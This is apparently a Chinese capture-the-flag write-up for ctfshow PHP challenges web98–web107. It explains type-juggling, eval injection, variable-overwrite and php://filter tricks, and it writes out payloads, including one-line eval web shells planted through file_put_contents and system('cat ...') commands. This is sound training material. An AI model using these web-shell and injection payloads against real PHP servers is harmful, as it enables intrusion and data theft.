<h1 id="web98"><a href="#web98" class="headerlink" title="web98"></a>web98</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$_GET</span>?<span class="variable">$_GET</span>=&amp;<span class="variable">$_POST</span>:<span class="string">&#x27;flag&#x27;</span>;</span><br><span class="line"><span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>]==<span class="string">&#x27;flag&#x27;</span>?<span class="variable">$_GET</span>=&amp;<span class="variable">$_COOKIE</span>:<span class="string">&#x27;flag&#x27;</span>;</span><br><span class="line"><span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>]==<span class="string">&#x27;flag&#x27;</span>?<span class="variable">$_GET</span>=&amp;<span class="variable">$_SERVER</span>:<span class="string">&#x27;flag&#x27;</span>;</span><br><span class="line">highlight_file(<span class="variable">$_GET</span>[<span class="string">&#x27;HTTP_FLAG&#x27;</span>]==<span class="string">&#x27;flag&#x27;</span>?<span class="variable">$flag</span>:<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.php.cn/php-weizijiaocheng-383293.html">php三元运算符与if的详解</a></p>
<p><a target="_blank" rel="noopener" href="https://www.php.cn/php-notebook-172859.html">php函数的传值与传址(引用)详解</a></p>
<p>既然get传入的值会被定位指向到post所对应的值，那么只需要有get存在即可，同时post传入HTTP_FLAG=flag就可以了</p>
<h1 id="web99"><a href="#web99" class="headerlink" title="web99"></a>web99</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$allow</span> = <span class="keyword">array</span>();</span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">36</span>; <span class="variable">$i</span> &lt; <span class="number">0x36d</span>; <span class="variable">$i</span>++) &#123; </span><br><span class="line">    array_push(<span class="variable">$allow</span>, rand(<span class="number">1</span>,<span class="variable">$i</span>));</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;n&#x27;</span>]) &amp;&amp; in_array(<span class="variable">$_GET</span>[<span class="string">&#x27;n&#x27;</span>], <span class="variable">$allow</span>))&#123;</span><br><span class="line">    file_put_contents(<span class="variable">$_GET</span>[<span class="string">&#x27;n&#x27;</span>], <span class="variable">$_POST</span>[<span class="string">&#x27;content&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>array_push() 函数：向数组尾部插入一个或多个元素</p>
<p>rand() 函数随机生成数组rand(min,max)</p>
<p>file_put_contents() 函数：写入函数</p>
<p>payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?n=<span class="number">5</span>.php</span><br><span class="line">content=<span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;hack&#x27;</span>]);<span class="meta">?&gt;</span></span><br><span class="line">content=<span class="meta">&lt;?php</span> system(<span class="string">&#x27;cat flag36d.php&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h1 id="web100"><a href="#web100" class="headerlink" title="web100"></a>web100</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;ctfshow.php&quot;</span>);</span><br><span class="line"><span class="comment">//flag in class ctfshow;</span></span><br><span class="line"><span class="variable">$ctfshow</span> = <span class="keyword">new</span> ctfshow();</span><br><span class="line"><span class="variable">$v1</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line"><span class="variable">$v2</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"><span class="variable">$v3</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"><span class="variable">$v0</span>=is_numeric(<span class="variable">$v1</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v2</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v3</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$v0</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;/&quot;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&quot;/\;/&quot;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">            <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$v2</span>(&#x27;ctfshow&#x27;)<span class="subst">$v3</span>&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;    </span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.jb51.net/article/42425.htm">php中OR与|| AND与&amp;&amp;的区别总结</a></p>
<p>因为赋值的优先级(=)高于and所以 v 0 的 值 可 以 由 v0的值可以由 v0的值可以由v1来控制，所以我们需要给其赋值为1也就是true</p>
<p>因为flag在类ctfshow中，所以可以直接命令执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?v1=1&amp;v2=var_dump($ctfshow)&amp;v3=;</span><br><span class="line">v1=1&amp;v2=system(&quot;cat ctfshow.php&quot;)/*&amp;v3=*/;</span><br></pre></td></tr></table></figure>



<h1 id="web101"><a href="#web101" class="headerlink" title="web101"></a>web101</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;ctfshow.php&quot;</span>);</span><br><span class="line"><span class="comment">//flag in class ctfshow;</span></span><br><span class="line"><span class="variable">$ctfshow</span> = <span class="keyword">new</span> ctfshow();</span><br><span class="line"><span class="variable">$v1</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line"><span class="variable">$v2</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"><span class="variable">$v3</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"><span class="variable">$v0</span>=is_numeric(<span class="variable">$v1</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v2</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v3</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$v0</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\&#123;|\[|\&quot;|\&#x27;|\,|\.|\;|\?|[0-9]/&quot;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\&#123;|\[|\&quot;|\&#x27;|\,|\.|\?|[0-9]/&quot;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">            <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$v2</span>(&#x27;ctfshow&#x27;)<span class="subst">$v3</span>&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>这里牵扯到的是一个反射类的问题</p>
<p><a target="_blank" rel="noopener" href="https://ask.dcloud.net.cn/article/631">php反射类 ReflectionClass使用例子</a></p>
<p><a target="_blank" rel="noopener" href="https://www.huaweicloud.com/articles/12460007.html">PHP的反射类ReflectionClass、ReflectionMethod使用实例</a></p>
<p><a target="_blank" rel="noopener" href="https://learnku.com/articles/7538/the-application-of-reflection-in-php">反射在 PHP 中的应用</a></p>
<p>利用new一个反射类，直接打印其信息</p>
<p><strong>payload：</strong><code>?v1=1&amp;v2=echo new ReflectionClass&amp;v3=;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class hacker&#123;</span><br><span class="line">	public $hackername = &quot;yn8rt&quot;;</span><br><span class="line">	const  yn8rt=&#x27;nb666&#x27;;</span><br><span class="line">	public  function show()&#123;</span><br><span class="line">	echo $this-&gt;name,&#x27;&lt;br&gt;&#x27;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">//有这么一个hacker类，假设我们不知道这个类是干什么用的，我们需要知道类里面的信息，这时候就需要用到ReflectionClass来对类进行反射</span><br><span class="line">//现在我可以通过反射来获取这个类中的方法，属性，常量</span><br><span class="line"></span><br><span class="line">//通过反射获取类的信息</span><br><span class="line"></span><br><span class="line">$reflection = new ReflectionClass(&#x27;hacker&#x27;);//实例化反射对象,映射hacker类的信息</span><br><span class="line">$consts = $reflection-&gt;getConstants();//获取所有常量</span><br><span class="line">$props = $reflection-&gt;getProperties();//获取所有属性</span><br><span class="line">$methods = $reflection-&gt;getMethods();//获取所有方法</span><br><span class="line">var_dump($consts);</span><br><span class="line">var_dump($props);</span><br><span class="line">var_dump($methods);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>返回值</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">array(1) &#123;</span><br><span class="line">  [&quot;yn8rt&quot;]=&gt;</span><br><span class="line">  string(5) &quot;nb666&quot;</span><br><span class="line">&#125;</span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]=&gt;</span><br><span class="line">  &amp;object(ReflectionProperty)#2 (2) &#123;</span><br><span class="line">    [&quot;name&quot;]=&gt;</span><br><span class="line">    string(10) &quot;hackername&quot;</span><br><span class="line">    [&quot;class&quot;]=&gt;</span><br><span class="line">    string(6) &quot;hacker&quot;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]=&gt;</span><br><span class="line">  &amp;object(ReflectionMethod)#3 (2) &#123;</span><br><span class="line">    [&quot;name&quot;]=&gt;</span><br><span class="line">    string(4) &quot;show&quot;</span><br><span class="line">    [&quot;class&quot;]=&gt;</span><br><span class="line">    string(6) &quot;hacker&quot;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>如果没有指定方法的话，就会像题目中默认输出很多东西：</p>
<p>1.常量 Contants<br>2.属性 Property Names<br>3.方法 Method Names静态<br>4.属性 Static Properties<br>5.命名空间 Namespace<br>6.Person类是否为final或者abstract<br>7.Person类是否有某个方法</p>
<h1 id="web102"><a href="#web102" class="headerlink" title="web102"></a>web102</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$v1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line"><span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"><span class="variable">$v3</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"><span class="variable">$v4</span> = is_numeric(<span class="variable">$v2</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v3</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$v4</span>)&#123;</span><br><span class="line">    <span class="variable">$s</span> = substr(<span class="variable">$v2</span>,<span class="number">2</span>);<span class="comment">// 这里的意思是从第二位开始截取</span></span><br><span class="line">    <span class="variable">$str</span> = call_user_func(<span class="variable">$v1</span>,<span class="variable">$s</span>);<span class="comment">// 回调函数，第一个参数为调用的函数，其余的为调用参数的值</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">    file_put_contents(<span class="variable">$v3</span>,<span class="variable">$str</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;hacker&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-string-substr.html">PHP substr() 函数</a></p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-string-hex2bin.html">PHP hex2bin() 函数</a>：参数只有一个，将传入的参数(16进制转换为ascii字符)</p>
<p>首先还是赋值与and的优先级问题，所以就要保证v2传入的值为经过is_numeric函数判断后返回的结果为true，然后就是利用回调函数来实现读取操作</p>
<p>所以就可以这么利用啊：</p>
<p>post:v1=hex2bin</p>
<p>get：?v2=0x3c3f706870206576616c28245f504f53545b27796e275d293b3f3e&amp;v3=yn.php</p>
<p>上面的16进制解码ascii：<?php eval($_POST['yn']);?></p>
<p>但是有个什么问题：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">var_dump(is_numeric(&quot;0x66&quot;));// 在php5中返回值为true</span><br><span class="line">var_dump(is_numeric(&quot;0x66&quot;));// 在php7中返回值为false</span><br></pre></td></tr></table></figure>

<p>本题的环境就是php7</p>
<p><strong>方法二</strong></p>
<p>利用<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=base64&spm=1001.2101.3001.7020">base64</a>，同时配合伪协议去写入，但是需要保证通过is_number函数的判断，可以有字母啊，但是必得是e啊，也就是科学计数法啊，来自同一家的payload啊：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$a=&#x27;&lt;?=`cat *`;&#x27;;</span><br><span class="line">$b=base64_encode($a);  // PD89YGNhdCAqYDs=</span><br><span class="line">$c=bin2hex($b);      //这里直接用去掉=的base64</span><br><span class="line">输出   5044383959474e6864434171594473</span><br><span class="line"></span><br><span class="line">带e的话会被认为是科学计数法，可以通过is_numeric检测。</span><br><span class="line">大家可以尝试下去掉=和带着=的base64解码出来的内容是相同的。因为等号在base64中只是起到填充的作用，不影响具体的数据内容。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?v2=115044383959474e6864434171594473&amp;v3=php://filter/write=convert.base64-decode/resource=1.php</span><br></pre></td></tr></table></figure>

<p>post：v1=hex2bin</p>
<p>然后访问1.php去触发就可以了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow&#123;98ff0fa4-7a07-4277-b7da-b20802f852ca&#125;</span><br></pre></td></tr></table></figure>

<h1 id="web103"><a href="#web103" class="headerlink" title="web103"></a>web103</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$v1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line"><span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"><span class="variable">$v3</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"><span class="variable">$v4</span> = is_numeric(<span class="variable">$v2</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v3</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$v4</span>)&#123;</span><br><span class="line">    <span class="variable">$s</span> = substr(<span class="variable">$v2</span>,<span class="number">2</span>);</span><br><span class="line">    <span class="variable">$str</span> = call_user_func(<span class="variable">$v1</span>,<span class="variable">$s</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/.*p.*h.*p.*/i&quot;</span>,<span class="variable">$str</span>))&#123;</span><br><span class="line">        file_put_contents(<span class="variable">$v3</span>,<span class="variable">$str</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Sorry&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;hacker&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>比上一题多过滤了一个php，只是为了让写入的文件中没有php，但是不影响我们，用上题的思路即可得到答案。</p>
<h1 id="web104-106"><a href="#web104-106" class="headerlink" title="web104 106"></a>web104 106</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(sha1(<span class="variable">$v1</span>)==sha1(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.sha1.php">sha1函数</a></p>
<p>没有强制类型转换的话，sha1是无法识别数组的，直接就是数组绕过了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line">GET：?v2[]=1</span><br><span class="line">POST：v1[]=2</span><br></pre></td></tr></table></figure>





<h1 id="web105"><a href="#web105" class="headerlink" title="web105"></a>web105</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="variable">$error</span>=<span class="string">&#x27;你还想要flag嘛？&#x27;</span>;</span><br><span class="line"><span class="variable">$suces</span>=<span class="string">&#x27;既然你想要那给你吧！&#x27;</span>;</span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$key</span>===<span class="string">&#x27;error&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;what are you doing?!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$$key</span>=<span class="variable">$$value</span>;</span><br><span class="line">&#125;<span class="keyword">foreach</span>(<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$value</span>===<span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;what are you doing?!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$$key</span>=<span class="variable">$$value</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(!(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>]==<span class="variable">$flag</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="variable">$error</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;your are good&quot;</span>.<span class="variable">$flag</span>.<span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="keyword">die</span>(<span class="variable">$suces</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>知识点：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">$$的变量覆盖</span><br><span class="line"></span><br><span class="line">GET和POST获得的参数是以键值对的形式存储的</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>第一个foreach是GET的键不能是error，第二个是POST的值不能是flag</p>
<p>题目一共有三个变量 $error $suces $flag我们只要令其中任意一个的值为flag，都是可以通过die或者直接echo输出的。</p>
<p>通过die($error)输出：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line">GET:?suces=flag</span><br><span class="line">POST:error=suces</span><br></pre></td></tr></table></figure>

<p>分析GET请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">foreach($_GET as $key =&gt; $value)&#123;</span><br><span class="line">    if($key===&#x27;error&#x27;)&#123;</span><br><span class="line">        die(&quot;what are you doing?!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    $$key=$$value;</span><br><span class="line">&#125;</span><br><span class="line">//当传入suces=flag时，实际上执行的是$suces=$flag</span><br><span class="line">//即把flag赋值给了suces变量</span><br></pre></td></tr></table></figure>

<p>分析：POST请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">foreach($_POST as $key =&gt; $value)&#123;</span><br><span class="line">    if($value===&#x27;flag&#x27;)&#123;</span><br><span class="line">        die(&quot;what are you doing?!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    $$key=$$value;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">//传入error=suces,得到$error=$suces=$flag</span><br><span class="line">//即成功把flag的值赋给了error变量</span><br></pre></td></tr></table></figure>



<h1 id="web107"><a href="#web107" class="headerlink" title="web107"></a>web107</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">       parse_str(<span class="variable">$v1</span>,<span class="variable">$v2</span>);</span><br><span class="line">       <span class="keyword">if</span>(<span class="variable">$v2</span>[<span class="string">&#x27;flag&#x27;</span>]==md5(<span class="variable">$v3</span>))&#123;</span><br><span class="line">           <span class="keyword">echo</span> <span 